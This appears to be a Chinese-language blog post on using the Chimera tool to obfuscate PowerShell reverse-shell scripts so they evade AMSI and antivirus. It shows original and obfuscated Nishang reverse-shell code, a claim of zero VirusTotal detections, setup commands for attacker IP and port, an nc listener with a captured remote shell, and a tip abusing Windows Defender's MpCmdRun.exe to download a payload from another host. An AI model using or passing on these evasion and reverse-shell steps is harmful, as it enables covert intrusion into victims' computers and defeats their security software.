Powershell脚本混淆绕过amsi/av

  • A+
所属分类:安全文章

https://github.com/tokyoneon/Chimera

以下是Invoke-PowerShellTcp.ps1的片段

$stream = $client.GetStream()

[byte[]]$bytes = 0..65535|%{0}

 

#Send back current username and computername

$sendbytes = ([text.encoding]::ASCII).GetBytes("WindowsPowerShell running as user " + $env:username + " on " +$env:computername + "`nCopyright (C) 2015 Microsoft Corporation. Allrights reserved.`n`n")

$stream.Write($sendbytes,0,$sendbytes.Length)

 

#Show an interactive PowerShell prompt

$sendbytes =([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')

$stream.Write($sendbytes,0,$sendbytes.Length)

Powershell脚本混淆绕过amsi/av

经过Chimera处理后

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.
 
  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal报告检测0个

Powershell脚本混淆绕过amsi/av

Kali下安装

sudo apt-get update && sudo apt-get install -Vy sed xxdlibc-bin curl jq perl gawk grep coreutils gitsudo git clone https://github.com/tokyoneon/chimera /opt/chimerasudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/sudo chmod +x chimera.sh; ./chimera.sh --help


在shells/目录中有几个Nishang脚本和一些通用脚本。所有都已经过测试

使用脚本之前,请将硬编码的IP地址(192.168.56.101)更改为您的Kali地址。

/opt/chimera$ sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1

所有脚本的默认端口为4444。如果需要,再次使用sed进行更改。

/opt/chimera$ sed -i 's/4444/<YOUR-DESIRED-PORT>/g' shells/*.ps1

-f:输入文件。

-o:输出文件。

-g:从脚本中省略几个Nishang特定的特征。

-v:替换变量名称。

-t:替换数据类型。

-j:替代函数名称。

-i:在每一行中插入任意注释。

-c:用任意数据替换注释。

-h:将IP地址转换为十六进制格式。

-s:替换各种字符串。

-b:在可能的情况下反引号字符串。

-e:过程完成后,检查混淆文件。

举例,nc反弹shell

nc -v -l -p 4444

把混淆好的脚本传入目标

PS> powershell.exe -ep bypassC:pathtochimera.ps1

获得shell

nc -v -l -p 4444

 

listening on [any] 4444 ...

192.168.56.105: inverse host lookup failed:Host name lookup failure

connect to [192.168.56.107] from (UNKNOWN)[192.168.56.105] 49725

Windows PowerShell running as user  on

Copyright (C) 2015 Microsoft Corporation. Allrights reserved.

 

PS C:Userstarget>

一些使用说明

https://github.com/tokyoneon/Chimera/blob/master/USAGE.md


一个tip

使用windows defender下载文件

C:ProgramDataMicrosoftWindowsDefenderPlatform4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\users\test\desktop\1.c

Powershell脚本混淆绕过amsi/av


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: